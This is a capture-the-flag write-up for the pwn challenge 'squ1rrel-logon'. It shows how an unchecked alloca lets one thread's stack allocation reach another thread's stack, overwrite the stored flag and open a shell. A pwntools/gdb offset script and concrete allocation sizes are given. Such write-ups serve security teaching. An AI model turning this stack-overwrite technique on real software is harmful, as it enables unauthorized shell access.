pwn/squ1rrel-logon
We are provided with a terminal
binary, that serves as a authenticated gateway to a command line shell on the target server.
The main
function spawns two threads, userinfo
and auth
:
int __fastcall main(int argc, const char **argv, const char **envp)
{
setbuf(stdout, 0LL);
setbuf(stdin, 0LL);
print_banner();
pthread_create(&userinfo_thread, 0LL, userinfo, 0LL);
pthread_create(&auth_thread, 0LL, auth, 0LL);
pthread_join(auth_thread, 0LL);
return 0;
}
Note that the auth
thread is spawned after the userinfo
thread. This will be important in a moment.
alloca
Let's have a look at the userinfo
thread:
void *__fastcall userinfo(void *a1)
{
void *v1; // rsp
void *v2; // rsp
_QWORD v4[2]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 sname_len; // [rsp+10h] [rbp-20h] BYREF
unsigned __int64 fname_len; // [rsp+18h] [rbp-18h] BYREF
const char *v7; // [rsp+20h] [rbp-10h]
const char *v8; // [rsp+28h] [rbp-8h]
v4[1] = a1;
puts("\x1B[1;36m[AUTH] User identification required\x1B[0m");
printf("First Name Length: ");
__isoc99_scanf("%ld%*c", &fname_len);
printf("Surname Length: ");
__isoc99_scanf("%ld%*c", &sname_len);
if ( fname_len > 0x100000000LL || sname_len > 0x100000000LL )
{
puts("Too long for our systems.");
exit(1);
}
v1 = alloca(16 * ((fname_len + 23) / 0x10));
v8 = (const char *)v4;
v2 = alloca(16 * ((sname_len + 23) / 0x10));
v7 = (const char *)v4;
printf("First Name: ");
readline(v8, fname_len);
printf("Surname: ");
readline(v7, sname_len);
printf("Authenticating Employee %s %s\n", v8, v7);
return 0LL;
}
Looks fairly normal, except for the call to alloca
. The alloca
function is similar to the malloc
function in that it dynamically allocates memory. However, unlike malloc
, it allocates memory on the stack instead of the heap.
We can see how this works by inspecting the assembly:
mov rax, [rbp+fname_len]
lea rdx, [rax+8]
mov eax, 10h
sub rax, 1
add rax, rdx
mov ecx, 10h
mov edx, 0
div rcx
imul rax, 10h
sub rsp, rax
After doing some math to round fname_len
up to the nearest 16 bytes, it simply does a sub rsp, rax
.
Recall that the stack grows from higher addresses to lower addresses, so a sub rsp, rax
will allocate space on the stack. This space will automatically be deallocated when the function exits as the stack frame is cleaned up.
However, notice that almost no checks are conducted to determine that we have sufficient stack space to accommodate the allocation. There is a check that fname_len
is not more than 0x100000000
bytes, but this is still a very generous limit (4GiB). We probably don't have 4GiB of stack space to allocate!
So, what happens if we alloca
more memory than we actually have? This will depend on the memory layout of the process. Let's have a look with vmmap
in GDB:
Our current thread, userinfo
, is thread 2. Our stack space spans from 0x00007ffff7401000
to 0x00007ffff7c01000
(stack-th2
).
Interestingly, the auth
thread's stack is at a lower address, 0x00007ffff6a01000
to 0x00007ffff7201000
(stack-th3
) than our thread . This is because the stack space for auth
was allocated after userinfo
.
This means that if we allocate a sufficiently large buffer, we can make rsp
point into the stack space of the auth
thread! We can then write a first name of our choice into the stack memory of auth
.
But what should we target in the auth
thread?
auth
Let's have a look at the auth
function:
void *__fastcall auth(void *a1)
{
char s1[256]; // [rsp+10h] [rbp-210h] BYREF
char buf[264]; // [rsp+110h] [rbp-110h] BYREF
int v4; // [rsp+218h] [rbp-8h]
int fd; // [rsp+21Ch] [rbp-4h]
fd = open("flag.txt", 0);
if ( fd < 0 )
{
puts("Error initializing authentication. Please contact support if on remote.");
exit(1);
}
v4 = read(fd, buf, 0x100uLL);
buf[v4 - 1] = 0;
close(fd);
pthread_join(userinfo_thread, 0LL);
printf("\x1B[1;36m[SYSTEM] Enter security token: \x1B[0m");
readline(s1, 256LL);
if ( !strcmp(s1, buf) )
{
puts("\x1B[1;32m[ACCESS GRANTED] Welcome to the system\x1B[0m");
system("/bin/sh");
}
else
{
puts("\x1B[1;31m[ACCESS DENIED] Invalid security token\x1B[0m");
puts("\x1B[1;31m[SYSTEM] Session terminated\x1B[0m");
}
return 0LL;
}
The key functionality of the auth
function is verifying that the user knows the flag, which is stored on the stack in the buf
variable. Since we do not know the flag, it is impossible to pass this check without cheating.
However, now that we can overwrite stack memory in auth
, all we need to do is overwrite buf
to a value we know, then enter that value as the secret to obtain the flag.
The only obstacle now is to determine the amount of memory to allocate so that rsp
falls exactly at the start of buf
.
To do this, I wrote a simple script to print the value of rsp
after the allocation of the buffer for the first name, and the address of buf
. We can then subtract these two values to determine the offset required:
from pwn import *
e = ELF("terminal")
context.binary = e
def setup():
p = process()
# p = remote("")
return p
if __name__ == '__main__':
p = setup()
_, g = gdb.attach(p, "break *0x401484\nbreak *0x4015fb\nc", api=True)
p.sendlineafter(b"Length:", b"10")
p.sendlineafter(b"Length:", b"10")
g.wait()
print(g.execute("p $rsp\nc", to_string=True))
p.sendlineafter(b"ame:", b"A\n")
p.sendlineafter(b"ame:", b"B\n")
p.sendlineafter(b"token", b"A\n")
g.wait()
print(g.execute("p $rsi\nc", to_string=True))
p.interactive()
Upon running this script, we might obtain something like
$1 = (void *) 0x7f5ae9fffe80
$3 = 0x7f5ae95ffdc0
The difference between these values is 10485952
, so we will need to update our fname_len
to 10485952+10
which is 10485962
.
Unfortunately, if we use this fname_len
as is, the program crashes with a segfault.
This is due to the stack space used during the
printf("Authenticating Employee %s %s\n", v8, v7);
call in userinfo
. As rsp
is within the stack memory of auth
, any additional allocations will overwrite critical addresses stored in the stack of auth
, resulting in a subsequent crash.
To solve this problem, we can set the surname length to a large value, such as 5000
. This will ensure that rsp
is far away from any critical parts of auth
's memory when the printf
call uses stack memory.
With this fix, we are successful in obtaining a shell locally:
However, the same exploit does not work on the server 🤔
Debugging
Perplexed, I sent my script and exploit to a teammate for some suggestions. To my surprise, the output of the script on his system was:
$1 = (void *) 0x7f68450aedb0
$2 = 0x7f68448adcea
The difference was 8392902, much smaller than the expected 10485952 calculated on my system.
On his system, the correct fname_len
should thus have been 8392912 instead of 10485962.
A vmmap
explains this discrepancy:
On this system, there is no space between the end of the stack space for the auth
thread and the start of the next mapped page. However, on my system, there is a large unmapped region, resulting in a larger offset. This difference is probably a result of different kernel versions handling the allocation of pages slightly differently.
After replacing the fname_len
with the newly calculated 8392912
, the exploit works as expected: